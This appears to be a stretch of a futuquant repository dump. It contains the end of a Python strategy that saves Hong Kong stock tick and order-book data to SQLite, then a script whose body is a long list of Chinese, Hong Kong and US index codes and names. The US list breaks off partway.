        sql_cmd = """ replace into stock_list_new(time,code,price,volume,turnover,ticker_direction,sequence,type) values(?,?,?,?,?,?,?,?) """
        # BUG FIX: itertuples() yields namedtuples, which cannot be indexed by
        # column name (row['time'] raised TypeError); iterrows() yields Series
        # rows that can.
        insertItemList = []
        for _, row in df.iterrows():
            insertItemList.append((row['time'], row['code'], row['price'], row['volume'],
                                   row['turnover'], row['ticker_direction'], row['sequence'], row['type']))
        result = self.exe_sql_many(sql_cmd, insertItemList)
        self.sqlitedb_tick.commit()
        return result

    def save_data_order(self, data_list):
        """Insert order-book snapshot rows from *data_list* and commit.

        NOTE(review): rows are indexed with row['date'] etc., so the queued
        quote objects must support mapping-style access -- confirm the
        TinyQuoteData type provides __getitem__.
        """
        sql_cmd = """ insert into stock_list_new(date_key,time,code,askPrice1,askPrice2,askPrice3,askPrice4,askPrice5,askVolume1,askVolume2,askVolume3,askVolume4,askVolume5,bidPrice1,bidPrice2,bidPrice3,bidPrice4,bidPrice5,bidVolume1,bidVolume2,bidVolume3,bidVolume4,bidVolume5,highPrice,lowPrice,lastPrice,openPrice,preClosePrice,priceSpread,volume) values(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) """
        insertItemList = []
        for row in data_list:
            insertItemList.append((row['date'], row['time'], row['code'], row['askPrice1'], row['askPrice2'], row['askPrice3'], row['askPrice4'], row['askPrice5'], row['askVolume1'], row['askVolume2'], row['askVolume3'], row['askVolume4'], row['askVolume5'], row['bidPrice1'], row['bidPrice2'], row['bidPrice3'], row['bidPrice4'], row['bidPrice5'], row['bidVolume1'], row['bidVolume2'], row['bidVolume3'], row['bidVolume4'], row['bidVolume5'], row['highPrice'], row['lowPrice'], row['lastPrice'], row['openPrice'], row['preClosePrice'], row['priceSpread'], row['volume']))
        result = self.exe_sql_many(sql_cmd, insertItemList)
        self.sqlitedb_tick.commit()
        return result

    def save_queue_data(self, symbol, data_queue):
        """Endless worker loop: drain *data_queue* and flush batches to SQLite.

        Flushes when more than 10 rows are pending, or after 5 seconds if
        anything is pending; sleeps briefly when nothing was flushed.
        """
        last_time = time.time()
        data_list = []
        while True:
            print("[%s] data_queue size is %s " % (symbol, data_queue.qsize()))
            tiny_quote = data_queue.get()
            data_list.append(tiny_quote)
            now_time = time.time()
            save_flag = False
            if len(data_list) > 10:
                # BUG FIX: log the batch size before clearing the list; the
                # original printed after reset and always reported 0.
                print("[%s] save data length [%s]" % (symbol, len(data_list)))
                self.save_data_order(data_list)
                data_list = []
                save_flag = True
            elif now_time - last_time > 5 and len(data_list) > 0:
                print("[%s] timeout save data length [%s]" % (symbol, len(data_list)))
                self.save_data_order(data_list)
                data_list = []
                save_flag = True
                last_time = now_time
            if not save_flag:
                time.sleep(1)
class TinyStrateSaveTick(TinyStrateBase):
    """Strategy name; used as the key for this strategy's block in setting.json."""
    name = 'tiny_strate_sample'
    # The bare string below is the original (Chinese) annotation for
    # symbol_pools: "pool of stocks whose quote data the strategy needs".
    """策略需要用到行情数据的股票池"""
    symbol_pools = ['HK.00700','HK.80000','HK.59972','HK.59828','HK.66115','HK.66490']

    def __init__(self):
        super(TinyStrateSaveTick, self).__init__()
        # Original annotation: "configure these parameters in setting.json".
        """请在setting.json中配置参数"""
        self.param1 = None
        self.param2 = None
        # Per-symbol multiprocessing queues feeding the SaveTickData workers.
        self.data_queue_dict = {}
        # NOTE(review): the pool has a single worker process, but
        # on_init_strate submits one infinite save_queue_data loop per symbol
        # in symbol_pools (6 of them) -- presumably only the first ever runs;
        # confirm whether processes should equal len(symbol_pools).
        self.pool = multiprocessing.Pool(processes = 1)

    def on_init_strate(self):
        """Callback fired after the strategy has loaded its configuration.
        1. symbol_pools and other internal strategy state may still be changed here
        2. futu api calls are not yet allowed at this point
        """
        # Start one queue + one DB-writer task per symbol, keyed by the code
        # suffix (e.g. '00700' from 'HK.00700').
        for symbol in TinyStrateSaveTick.symbol_pools:
            self.data_queue_dict[symbol.split('.')[1]] = multiprocessing.Manager().Queue()
            stdObj = SaveTickData(symbol.split('.')[1])
            self.pool.apply_async(stdObj.save_queue_data, (symbol, self.data_queue_dict[symbol.split('.')[1]]))

    def on_start(self):
        """Callback fired once the strategy has fully started.
        1. The framework is initialized; any futu api call may be made now
        2. Changing symbol_pools here has no effect; no new quote callbacks result
        """
        self.log("on_start param1=%s param2=%s" %(self.param1, self.param2))
        # The triple-quoted string below is disabled example code for the
        # trading interface (note the Python 2 'print str_info' inside it);
        # it is never executed.
        """交易接口测试
        ret, data = self.buy(4.60, 1000, 'HK.03883')
        if 0 == ret:
            order_id = data
            ret, data = self.get_tiny_trade_order(order_id)
            if 0 == ret:
                str_info = ''
                for key in data.__dict__.keys():
                    str_info += "%s='%s' " % (key, data.__dict__[key])
                print str_info
        ret, data = self.sell(11.4, 1000, 'HK.01357')
        if 0 == ret:
            order_id = data
            self.cancel_order(order_id)
        """

    def on_quote_changed(self, tiny_quote):
        """Callback fired whenever quote/order-book data changes in real time."""
        # TinyQuoteData
        symbol = tiny_quote.symbol
        self.log("get data from {%s}" % symbol)
        # Hand the quote to the per-symbol writer process via its queue.
        self.data_queue_dict[symbol.split('.')[1]].put(tiny_quote)

    def on_bar_min1(self, tiny_bar):
        """Callback fired once per minute with a 1-minute bar."""
        bar = tiny_bar
        symbol = bar.symbol
        str_dt = bar.datetime.strftime("%Y%m%d %H:%M:%S")
        # Get the minute-bar ArrayManager (vnpy) object for this symbol.
        am = self.get_kl_min1_am(symbol)
        array_high = am.high
        array_low = am.low
        array_open = am.open
        array_close = am.close
        array_vol = am.volume
        # 5-period EMA of each OHLCV series, logged for inspection.
        n = 5
        ma_high = self.ema(array_high, n)
        ma_low = self.ema(array_low, n)
        ma_open = self.ema(array_open, n)
        ma_close = self.ema(array_close, n)
        ma_vol = self.ema(array_vol, n)
        str_log = "on_bar_min1 symbol=%s dt=%s ema(%s) open=%s high=%s close=%s low=%s vol=%s" % (
            symbol, str_dt, n, ma_open, ma_high, ma_close, ma_low, ma_vol)
        self.log(str_log)

    def on_bar_day(self, tiny_bar):
        """Callback fired once at market close with the daily bar."""
        bar = tiny_bar
        symbol = bar.symbol
        str_dt = bar.datetime.strftime("%Y%m%d %H:%M:%S")
        str_log = "on_bar_day symbol=%s dt=%s open=%s high=%s close=%s low=%s vol=%s" % (
            symbol, str_dt, bar.open, bar.high, bar.close, bar.low, bar.volume)
        self.log(str_log)

    def on_before_trading(self, date_time):
        """Callback fired once at market open; when running across trading days,
        HK market fires at 09:30:00."""
        str_log = "on_before_trading - %s" % date_time.strftime('%Y-%m-%d %H:%M:%S')
        self.log(str_log)

    def on_after_trading(self, date_time):
        """Callback fired once at market close; when left running,
        HK market fires at 16:00:00."""
        str_log = "on_after_trading - %s" % date_time.strftime('%Y-%m-%d %H:%M:%S')
        self.log(str_log)

    def sma(self, np_array, n, array=False):
        """Simple moving average; returns the full array when *array* is True,
        otherwise the latest value."""
        if n < 2:
            # Window too small to average: pass the input through unchanged.
            result = np_array
        else:
            result = talib.SMA(np_array, n)
        if array:
            return result
        return result[-1]

    def ema(self, np_array, n, array=False):
        """Exponential moving average; returns the full array when *array* is
        True, otherwise the latest value."""
        if n < 2:
            # Window too small to average: pass the input through unchanged.
            result = np_array
        else:
            result = talib.EMA(np_array, n)
        if array:
            return result
        return result[-1]
|
xxm1988/futuquant | futuquant/examples/learn/get_index_stocks.py | # -*- coding: utf-8 -*-
"""
得到一个指数下面所有的股票信息
"""
import futuquant as ft
# 如下数据源由 enum_all_index_stocks 接口生成, 后续请自行手动运行更新
'''SH INDEX
code name
0 SH.000000 060001
1 SH.000001 上证指数
2 SH.000002 A股指数
3 SH.000003 B股指数
4 SH.000004 工业指数
5 SH.000005 商业指数
6 SH.000006 地产指数
7 SH.000007 公用指数
8 SH.000008 综合指数
9 SH.000009 上证380
10 SH.000010 上证180
11 SH.000011 基金指数
12 SH.000012 国债指数
13 SH.000013 企债指数
14 SH.000015 红利指数
15 SH.000016 上证50
16 SH.000017 新综指
17 SH.000018 180金融
18 SH.000019 治理指数
19 SH.000020 中型综指
20 SH.000021 180治理
21 SH.000022 沪公司债
22 SH.000023 沪分离债
23 SH.000025 180基建
24 SH.000026 180资源
25 SH.000027 180运输
26 SH.000028 180成长
27 SH.000029 180价值
28 SH.000030 180R成长
29 SH.000031 180R价值
30 SH.000032 上证能源
31 SH.000033 上证材料
32 SH.000034 上证工业
33 SH.000035 上证可选
34 SH.000036 上证消费
35 SH.000037 上证医药
36 SH.000038 上证金融
37 SH.000039 上证信息
38 SH.000040 上证电信
39 SH.000041 上证公用
40 SH.000042 上证央企
41 SH.000043 超大盘
42 SH.000044 上证中盘
43 SH.000045 上证小盘
44 SH.000046 上证中小
45 SH.000047 上证全指
46 SH.000048 责任指数
47 SH.000049 上证民企
48 SH.000050 50等权
49 SH.000051 180等权
50 SH.000052 50基本
51 SH.000053 180基本
52 SH.000054 上证海外
53 SH.000055 上证地企
54 SH.000056 上证国企
55 SH.000057 全指成长
56 SH.000058 全指价值
57 SH.000059 全R成长
58 SH.000060 全R价值
59 SH.000061 沪企债30
60 SH.000062 上证沪企
61 SH.000063 上证周期
62 SH.000064 非周期
63 SH.000065 上证龙头
64 SH.000066 上证商品
65 SH.000067 上证新兴
66 SH.000068 上证资源
67 SH.000069 消费80
68 SH.000070 能源等权
69 SH.000071 材料等权
70 SH.000072 工业等权
71 SH.000073 可选等权
72 SH.000074 消费等权
73 SH.000075 医药等权
74 SH.000076 金融等权
75 SH.000077 信息等权
76 SH.000078 电信等权
77 SH.000079 公用等权
78 SH.000090 上证流通
79 SH.000091 沪财中小
80 SH.000092 资源50
81 SH.000093 180分层
82 SH.000094 上证上游
83 SH.000095 上证中游
84 SH.000096 上证下游
85 SH.000097 高端装备
86 SH.000098 上证F200
87 SH.000099 上证F300
88 SH.000100 上证F500
89 SH.000101 5年信用
90 SH.000102 沪投资品
91 SH.000103 沪消费品
92 SH.000104 380能源
93 SH.000105 380材料
94 SH.000106 380工业
95 SH.000107 380可选
96 SH.000108 380消费
97 SH.000109 380医药
98 SH.000110 380金融
99 SH.000111 380信息
100 SH.000112 380电信
101 SH.000113 380公用
102 SH.000114 持续产业
103 SH.000115 380等权
104 SH.000116 信用100
105 SH.000117 380成长
106 SH.000118 380价值
107 SH.000119 380R成长
108 SH.000120 380R价值
109 SH.000121 医药主题
110 SH.000122 农业主题
111 SH.000123 180动态
112 SH.000125 180稳定
113 SH.000126 消费50
114 SH.000128 380基本
115 SH.000129 180波动
116 SH.000130 380波动
117 SH.000131 上证高新
118 SH.000132 上证100
119 SH.000133 上证150
120 SH.000134 上证银行
121 SH.000135 180高贝
122 SH.000136 180低贝
123 SH.000137 380高贝
124 SH.000138 380低贝
125 SH.000139 上证转债
126 SH.000141 380动态
127 SH.000142 380稳定
128 SH.000145 优势资源
129 SH.000146 优势制造
130 SH.000147 优势消费
131 SH.000148 消费领先
132 SH.000149 180红利
133 SH.000150 380红利
134 SH.000151 上国红利
135 SH.000152 上央红利
136 SH.000153 上民红利
137 SH.000155 市值百强
138 SH.000158 上证环保
139 SH.000159 沪股通
140 SH.000160 沪新丝路
141 SH.000161 沪中国造
142 SH.000162 沪互联+
143 SH.000170 50AH优选
144 SH.000171 新兴成指
145 SH.000188 中国波指
146 SH.000300 沪深300
147 SH.000801 资源80
148 SH.000802 500沪市
149 SH.000803 300波动
150 SH.000804 500波动
151 SH.000805 A股资源
152 SH.000806 消费服务
153 SH.000807 食品饮料
154 SH.000808 医药生物
155 SH.000809 细分农业
156 SH.000810 细分能源
157 SH.000811 细分有色
158 SH.000812 细分机械
159 SH.000813 细分化工
160 SH.000814 细分医药
161 SH.000815 细分食品
162 SH.000816 细分地产
163 SH.000817 兴证海峡
164 SH.000818 细分金融
165 SH.000819 有色金属
166 SH.000820 煤炭指数
167 SH.000821 300红利
168 SH.000822 500红利
169 SH.000823 800有色
170 SH.000824 国企红利
171 SH.000825 央企红利
172 SH.000826 民企红利
173 SH.000827 中证环保
174 SH.000828 300高贝
175 SH.000829 300低贝
176 SH.000830 500高贝
177 SH.000831 500低贝
178 SH.000832 中证转债
179 SH.000833 中高企债
180 SH.000838 创业价值
181 SH.000839 浙企综指
182 SH.000840 浙江民企
183 SH.000841 800医药
184 SH.000842 800等权
185 SH.000843 300动态
186 SH.000844 300稳定
187 SH.000846 ESG100
188 SH.000847 腾讯济安
189 SH.000849 300非银
190 SH.000850 300有色
191 SH.000851 百发100
192 SH.000852 中证1000
193 SH.000853 CSSW丝路
194 SH.000854 500原料
195 SH.000855 央视500
196 SH.000856 500工业
197 SH.000857 500医药
198 SH.000858 500信息
199 SH.000863 CS精准医
200 SH.000865 上海国企
201 SH.000867 港中小企
202 SH.000869 HK银行
203 SH.000874 000874
204 SH.000891 新兴综指
205 SH.000901 小康指数
206 SH.000902 中证流通
207 SH.000903 中证100
208 SH.000904 中证200
209 SH.000905 中证500
210 SH.000906 中证800
211 SH.000907 中证700
212 SH.000908 300能源
213 SH.000909 300材料
214 SH.000910 300工业
215 SH.000911 300可选
216 SH.000912 300消费
217 SH.000913 300医药
218 SH.000914 300金融
219 SH.000915 300信息
220 SH.000916 300电信
221 SH.000917 300公用
222 SH.000918 300成长
223 SH.000919 300价值
224 SH.000920 300R成长
225 SH.000921 300R价值
226 SH.000922 中证红利
227 SH.000923 公司债
228 SH.000924 分离债
229 SH.000925 基本面50
230 SH.000926 中证央企
231 SH.000927 央企100
232 SH.000928 中证能源
233 SH.000929 中证材料
234 SH.000930 中证工业
235 SH.000931 中证可选
236 SH.000932 中证消费
237 SH.000933 中证医药
238 SH.000934 中证金融
239 SH.000935 中证信息
240 SH.000936 中证电信
241 SH.000937 中证公用
242 SH.000938 中证民企
243 SH.000939 民企200
244 SH.000940 财富大盘
245 SH.000941 新能源
246 SH.000942 内地消费
247 SH.000943 内地基建
248 SH.000944 内地资源
249 SH.000945 内地运输
250 SH.000946 内地金融
251 SH.000947 内地银行
252 SH.000948 内地地产
253 SH.000949 内地农业
254 SH.000950 300基建
255 SH.000951 300银行
256 SH.000952 300地产
257 SH.000953 中证地企
258 SH.000954 地企100
259 SH.000955 中证国企
260 SH.000956 国企200
261 SH.000957 300运输
262 SH.000958 创业成长
263 SH.000959 银河99
264 SH.000960 中证龙头
265 SH.000961 中证上游
266 SH.000962 中证中游
267 SH.000963 中证下游
268 SH.000964 中证新兴
269 SH.000965 基本200
270 SH.000966 基本400
271 SH.000967 基本600
272 SH.000968 300周期
273 SH.000969 300非周
274 SH.000970 ESG40
275 SH.000971 等权90
276 SH.000972 300沪市
277 SH.000973 技术领先
278 SH.000974 800金融
279 SH.000975 钱江30
280 SH.000976 新华金牛
281 SH.000977 内地低碳
282 SH.000978 医药100
283 SH.000979 大宗商品
284 SH.000980 中证超大
285 SH.000981 300分层
286 SH.000982 500等权
287 SH.000983 智能资产
288 SH.000984 300等权
289 SH.000985 中证全指
290 SH.000986 全指能源
291 SH.000987 全指材料
292 SH.000988 全指工业
293 SH.000989 全指可选
294 SH.000990 全指消费
295 SH.000991 全指医药
296 SH.000992 全指金融
297 SH.000993 全指信息
298 SH.000994 全指电信
299 SH.000995 全指公用
300 SH.000996 领先行业
301 SH.000997 大消费
302 SH.000998 中证TMT
303 SH.000999 两岸三地
'''
'''SZ INDEX
0 SZ.399001 深证成指
1 SZ.399002 深成指R
2 SZ.399003 成份B指
3 SZ.399004 深证100R
4 SZ.399005 中小板指
5 SZ.399006 创业板指
6 SZ.399007 深证300
7 SZ.399008 中小300
8 SZ.399009 深证200
9 SZ.399010 深证700
10 SZ.399011 深证1000
11 SZ.399012 创业300
12 SZ.399013 深市精选
13 SZ.399015 中小创新
14 SZ.399016 深证创新
15 SZ.399017 SME创新
16 SZ.399018 创业创新
17 SZ.399100 新指数
18 SZ.399101 中小板综
19 SZ.399102 创业板综
20 SZ.399103 乐富指数
21 SZ.399106 深证综指
22 SZ.399107 深证A指
23 SZ.399108 深证B指
24 SZ.399231 农林指数
25 SZ.399232 采矿指数
26 SZ.399233 制造指数
27 SZ.399234 水电指数
28 SZ.399235 建筑指数
29 SZ.399236 批零指数
30 SZ.399237 运输指数
31 SZ.399238 餐饮指数
32 SZ.399239 IT指数
33 SZ.399240 金融指数
34 SZ.399241 地产指数
35 SZ.399242 商务指数
36 SZ.399243 科研指数
37 SZ.399244 公共指数
38 SZ.399248 文化指数
39 SZ.399249 综企指数
40 SZ.399298 深信中高
41 SZ.399299 深信中低
42 SZ.399300 沪深300
43 SZ.399301 深信用债
44 SZ.399302 深公司债
45 SZ.399303 国证2000
46 SZ.399305 基金指数
47 SZ.399306 深证ETF
48 SZ.399307 深证转债
49 SZ.399310 国证50
50 SZ.399311 国证1000
51 SZ.399312 国证300
52 SZ.399313 巨潮100
53 SZ.399314 巨潮大盘
54 SZ.399315 巨潮中盘
55 SZ.399316 巨潮小盘
56 SZ.399317 国证A指
57 SZ.399318 国证B指
58 SZ.399319 资源优势
59 SZ.399320 国证服务
60 SZ.399321 国证红利
61 SZ.399322 国证治理
62 SZ.399324 深证红利
63 SZ.399326 成长40
64 SZ.399328 深证治理
65 SZ.399330 深证100
66 SZ.399332 深证创新
67 SZ.399333 中小板R
68 SZ.399335 深证央企
69 SZ.399337 深证民营
70 SZ.399339 深证科技
71 SZ.399341 深证责任
72 SZ.399344 深证300R
73 SZ.399346 深证成长
74 SZ.399348 深证价值
75 SZ.399350 皖江30
76 SZ.399351 深报指数
77 SZ.399352 深报综指
78 SZ.399353 国证物流
79 SZ.399354 分析师指数
80 SZ.399355 长三角
81 SZ.399356 珠三角
82 SZ.399357 环渤海
83 SZ.399358 泰达指数
84 SZ.399359 国证基建
85 SZ.399360 新硬件
86 SZ.399361 国证商业
87 SZ.399362 国证民营
88 SZ.399363 计算机指
89 SZ.399364 中金消费
90 SZ.399365 国证农业
91 SZ.399366 国证大宗
92 SZ.399367 巨潮地产
93 SZ.399368 国证军工
94 SZ.399369 CBN-兴全
95 SZ.399370 国证成长
96 SZ.399371 国证价值
97 SZ.399372 大盘成长
98 SZ.399373 大盘价值
99 SZ.399374 中盘成长
100 SZ.399375 中盘价值
101 SZ.399376 小盘成长
102 SZ.399377 小盘价值
103 SZ.399378 南方低碳
104 SZ.399379 国证基金
105 SZ.399380 国证ETF
106 SZ.399381 1000能源
107 SZ.399382 1000材料
108 SZ.399383 1000工业
109 SZ.399384 1000可选
110 SZ.399385 1000消费
111 SZ.399386 1000医药
112 SZ.399387 1000金融
113 SZ.399388 1000信息
114 SZ.399389 国证通信
115 SZ.399390 1000公用
116 SZ.399391 投资时钟
117 SZ.399392 国证新兴
118 SZ.399393 国证地产
119 SZ.399394 国证医药
120 SZ.399395 国证有色
121 SZ.399396 国证食品
122 SZ.399397 OCT文化
123 SZ.399398 绩效指数
124 SZ.399399 中经GDP
125 SZ.399400 大中盘
126 SZ.399401 中小盘
127 SZ.399402 周期100
128 SZ.399403 防御100
129 SZ.399404 大盘低波
130 SZ.399405 大盘高贝
131 SZ.399406 中盘低波
132 SZ.399407 中盘高贝
133 SZ.399408 小盘低波
134 SZ.399409 小盘高贝
135 SZ.399410 苏州率先
136 SZ.399411 红利100
137 SZ.399412 国证新能
138 SZ.399413 国证转债
139 SZ.399415 I100
140 SZ.399416 I300
141 SZ.399417 新能源车
142 SZ.399418 国证国安
143 SZ.399419 国证高铁
144 SZ.399420 国证保证
145 SZ.399422 中关村A
146 SZ.399423 中关村50
147 SZ.399427 专利领先
148 SZ.399428 国证定增
149 SZ.399429 新丝路
150 SZ.399431 国证银行
151 SZ.399432 国证汽车
152 SZ.399433 国证交运
153 SZ.399434 国证传媒
154 SZ.399435 国证农牧
155 SZ.399436 国证煤炭
156 SZ.399437 国证证券
157 SZ.399438 国证电力
158 SZ.399439 国证油气
159 SZ.399440 国证钢铁
160 SZ.399441 生物医药
161 SZ.399481 企债指数
162 SZ.399550 央视50
163 SZ.399551 央视创新
164 SZ.399552 央视成长
165 SZ.399553 央视回报
166 SZ.399554 央视治理
167 SZ.399555 央视责任
168 SZ.399556 央视生态
169 SZ.399557 央视文化
170 SZ.399602 中小成长
171 SZ.399604 中小价值
172 SZ.399606 创业板R
173 SZ.399608 科技100
174 SZ.399610 TMT50
175 SZ.399611 中创100R
176 SZ.399612 中创100
177 SZ.399613 深证能源
178 SZ.399614 深证材料
179 SZ.399615 深证工业
180 SZ.399616 深证可选
181 SZ.399617 深证消费
182 SZ.399618 深证医药
183 SZ.399619 深证金融
184 SZ.399620 深证信息
185 SZ.399621 深证电信
186 SZ.399622 深证公用
187 SZ.399623 中小基础
188 SZ.399624 中创400
189 SZ.399625 中创500
190 SZ.399626 中创成长
191 SZ.399627 中创价值
192 SZ.399628 700成长
193 SZ.399629 700价值
194 SZ.399630 1000成长
195 SZ.399631 1000价值
196 SZ.399632 深100EW
197 SZ.399633 深300EW
198 SZ.399634 中小板EW
199 SZ.399635 创业板EW
200 SZ.399636 深证装备
201 SZ.399637 深证地产
202 SZ.399638 深证环保
203 SZ.399639 深证大宗
204 SZ.399640 创业基础
205 SZ.399641 深证新兴
206 SZ.399642 中小新兴
207 SZ.399643 创业新兴
208 SZ.399644 深证时钟
209 SZ.399645 100低波
210 SZ.399646 深消费50
211 SZ.399647 深医药50
212 SZ.399648 深证GDP
213 SZ.399649 中小红利
214 SZ.399650 中小治理
215 SZ.399651 中小责任
216 SZ.399652 中创高新
217 SZ.399653 深证龙头
218 SZ.399654 深证文化
219 SZ.399655 深证绩效
220 SZ.399656 100绩效
221 SZ.399657 300绩效
222 SZ.399658 中小绩效
223 SZ.399659 深成指EW
224 SZ.399660 中创EW
225 SZ.399661 深证低波
226 SZ.399662 深证高贝
227 SZ.399663 中小低波
228 SZ.399664 中小高贝
229 SZ.399665 中创低波
230 SZ.399666 中创高贝
231 SZ.399667 创业板G
232 SZ.399668 创业板V
233 SZ.399669 深证农业
234 SZ.399670 深周期50
235 SZ.399671 深防御50
236 SZ.399672 深红利50
237 SZ.399673 创业板50
238 SZ.399674 深A医药
239 SZ.399675 深互联网
240 SZ.399676 深医药EW
241 SZ.399677 深互联EW
242 SZ.399678 深次新股
243 SZ.399679 深证200R
244 SZ.399680 深成能源
245 SZ.399681 深成材料
246 SZ.399682 深成工业
247 SZ.399683 深成可选
248 SZ.399684 深成消费
249 SZ.399685 深成医药
250 SZ.399686 深成金融
251 SZ.399687 深成信息
252 SZ.399688 深成电信
253 SZ.399689 深成公用
254 SZ.399690 中小专利
255 SZ.399691 创业专利
256 SZ.399692 创业低波
257 SZ.399693 安防产业
258 SZ.399694 创业高贝
259 SZ.399695 深证节能
260 SZ.399696 深证创投
261 SZ.399697 中关村60
262 SZ.399698 优势成长
263 SZ.399699 金融科技
264 SZ.399701 深证F60
265 SZ.399702 深证F120
266 SZ.399703 深证F200
267 SZ.399704 深证上游
268 SZ.399705 深证中游
269 SZ.399706 深证下游
270 SZ.399707 CSSW证券
271 SZ.399802 500深市
272 SZ.399803 工业4.0
273 SZ.399804 中证体育
274 SZ.399805 互联金融
275 SZ.399806 环境治理
276 SZ.399807 高铁产业
277 SZ.399808 中证新能
278 SZ.399809 保险主题
279 SZ.399810 CSSW传媒
280 SZ.399811 CSSW电子
281 SZ.399812 养老产业
282 SZ.399813 中证国安
283 SZ.399814 大农业
284 SZ.399817 生态100
285 SZ.399901 小康指数
286 SZ.399902 中证流通
287 SZ.399903 中证100
288 SZ.399904 中证200
289 SZ.399905 中证500
290 SZ.399906 中证800
291 SZ.399907 中证700
292 SZ.399908 300能源
293 SZ.399909 300材料
294 SZ.399910 300工业
295 SZ.399911 300可选
296 SZ.399912 300消费
297 SZ.399913 300医药
298 SZ.399914 300金融
299 SZ.399915 300信息
300 SZ.399916 300电信
301 SZ.399917 300公用
302 SZ.399918 300成长
303 SZ.399919 300价值
304 SZ.399920 300R成长
305 SZ.399921 300R价值
306 SZ.399922 中证红利
307 SZ.399923 公司债指
308 SZ.399924 分离债指
309 SZ.399925 基本面50
310 SZ.399926 中证央企
311 SZ.399927 央企100
312 SZ.399928 中证能源
313 SZ.399929 中证材料
314 SZ.399930 中证工业
315 SZ.399931 中证可选
316 SZ.399932 中证消费
317 SZ.399933 中证医药
318 SZ.399934 中证金融
319 SZ.399935 中证信息
320 SZ.399936 中证电信
321 SZ.399937 中证公用
322 SZ.399938 中证民企
323 SZ.399939 民企200
324 SZ.399940 财富大盘
325 SZ.399941 新能源
326 SZ.399942 内地消费
327 SZ.399943 内地基建
328 SZ.399944 内地资源
329 SZ.399945 内地运输
330 SZ.399946 内地金融
331 SZ.399947 内地银行
332 SZ.399948 内地地产
333 SZ.399949 内地农业
334 SZ.399950 300基建
335 SZ.399951 300银行
336 SZ.399952 300地产
337 SZ.399953 中证地企
338 SZ.399954 地企100
339 SZ.399955 中证国企
340 SZ.399956 国企200
341 SZ.399957 300运输
342 SZ.399958 创业成长
343 SZ.399959 军工指数
344 SZ.399960 中证龙头
345 SZ.399961 中证上游
346 SZ.399962 中证中游
347 SZ.399963 中证下游
348 SZ.399964 中证新兴
349 SZ.399965 800地产
350 SZ.399966 800非银
351 SZ.399967 中证军工
352 SZ.399968 300周期
353 SZ.399969 300非周
354 SZ.399970 移动互联
355 SZ.399971 中证传媒
356 SZ.399972 300深市
357 SZ.399973 中证国防
358 SZ.399974 国企改革
359 SZ.399975 证券公司
360 SZ.399976 CS新能车
361 SZ.399977 内地低碳
362 SZ.399978 医药100
363 SZ.399979 大宗商品
364 SZ.399980 中证超大
365 SZ.399981 300分层
366 SZ.399982 500等权
367 SZ.399983 地产等权
368 SZ.399984 300等权
369 SZ.399985 中证全指
370 SZ.399986 中证银行
371 SZ.399987 中证酒
372 SZ.399989 中证医疗
373 SZ.399990 煤炭等权
374 SZ.399991 一带一路
375 SZ.399992 CSWD并购
376 SZ.399993 CSWD生科
377 SZ.399994 信息安全
378 SZ.399995 基建工程
379 SZ.399996 智能家居
380 SZ.399997 中证白酒
381 SZ.399998 中证煤炭
'''
''' HK INDEX
code name
0 HK.100000 黄金期货
1 HK.100100 石油期货
2 HK.100200 白银期货
3 HK.100300 铂金期货
4 HK.100400 MTW
5 HK.100500 TCB
6 HK.100600 TCE
7 HK.100700 TCF
8 HK.100701 人民币汇率
9 HK.100702 欧美汇率
10 HK.100703 澳美汇率
11 HK.800000 恒生指数
12 HK.800100 国企指数
13 HK.800121 标普香港大型股指数
14 HK.800122 沪深300指数
15 HK.800123 中证香港100指数
16 HK.800124 中证两岸三地500指数
17 HK.800125 恒指波幅指数
18 HK.800126 中证内地消费指数
19 HK.800127 中证香港内地民营企业指数
20 HK.800129 中证香港上市可交易内地地产指数
21 HK.800130 中证香港上市可交易内地消费指数
22 HK.800131 中证海外内地股港元指数
23 HK.800132 中证香港红利港币指数
24 HK.800133 中证锐联香港基本面50港币指数
25 HK.800134 中证香港中盘精选港币指数
26 HK.800135 中证香港内地股港元指数
27 HK.800136 中华交易服务中国120指数
28 HK.800137 中华交易服务中国A80指数
29 HK.800138 中华交易服务中国香港内地指数
30 HK.800139 中证香港内地国有企业指数
31 HK.800140 标普香港创业板指数
32 HK.800141 上证180指数
33 HK.800142 上证180公司治理指数
34 HK.800143 上证380指数
35 HK.800144 上证50指数
36 HK.800145 上证大宗商品股票指数
37 HK.800146 上证综合指数
38 HK.800147 上证红利指数
39 HK.800148 上证龙头企业指数
40 HK.800149 上证中盘指数
41 HK.800150 上证超级大盘指数
42 HK.800151 红筹指数
43 HK.800152 恒生金融分类指数
44 HK.800153 恒生公用分类指数
45 HK.800154 恒生地产分类指数
46 HK.800155 恒生工商分类指数
47 HK.800200 道琼斯指数
'''
''' US INDEX
0 US..IXIC 纳斯达克综合指数
1 US..DJI 道琼斯指数
2 US..DJT 道琼斯交通运输平均指数
3 US..DJU 道琼斯公用事业平均指数
4 US..DJUS 道琼斯美国指数
5 US..DJUSAE 道琼斯美国航空航天与国防指数
6 US..DJUSAF "Dow Jones US Delivery Services Index
"
7 US..DJUSAG "Dow Jones US Asset Managers Index
"
8 US..DJUSAI 道琼斯美国电子设备指数
9 US..DJUSAL 道琼斯美铝指数
10 US..DJUSAM 道琼斯美国医疗器械指数
11 US..DJUSAP 道琼斯美国汽车零部件指数
12 US..DJUSAR 道琼斯美国航空指数
13 US..DJUSAS 道琼斯美国航空航天指数
14 US..DJUSAT 道琼斯美国汽车零部件指数
15 US..DJUSAU 道琼斯美国汽车指数
16 US..DJUSAV 道琼斯美国媒体代理指数
17 US..DJUSBC 道琼斯美国广播娱乐指数
18 US..DJUSBD 道琼斯美国建筑材料及灯具指数
19 US..DJUSBE "Dow Jones US Business Training & Employment Agencies Index
"
20 US..DJUSBK 道琼斯美国银行指数
21 US..DJUSBM 道琼斯美国基础材料指数
22 US..DJUSBS 道琼斯美国基础资源指数
23 US..DJUSBT 道琼斯美国生物技术指数
24 US..DJUSBV 道琼斯美国饮料指数
25 US..DJUSCA 道琼斯美国赌博指数
26 US..DJUSCC 道琼斯美国商品化学品指数
27 US..DJUSCF 道琼斯美国服装配饰指数
28 US..DJUSCG 道琼斯美国旅游休闲指数
29 US..DJUSCH 道琼斯美国化学品指数
30 US..DJUSCL 道琼斯美国煤炭指数
31 US..DJUSCM 道琼斯美国个人产品指数
32 US..DJUSCN 道琼斯美国建筑材料指数
33 US..DJUSCP 道琼斯美国集装箱和包装指数
34 US..DJUSCR 道琼斯美国计算机硬件指数
35 US..DJUSCS 道琼斯美国专业消费者服务指数
36 US..DJUSCT 道琼斯美国电讯设备指数
37 US..DJUSCX 道琼斯美国特种化学品指数
38 US..DJUSCY 道琼斯美国消费者服务指数
39 US..DJUSDB 道琼斯美国酿酒商指数
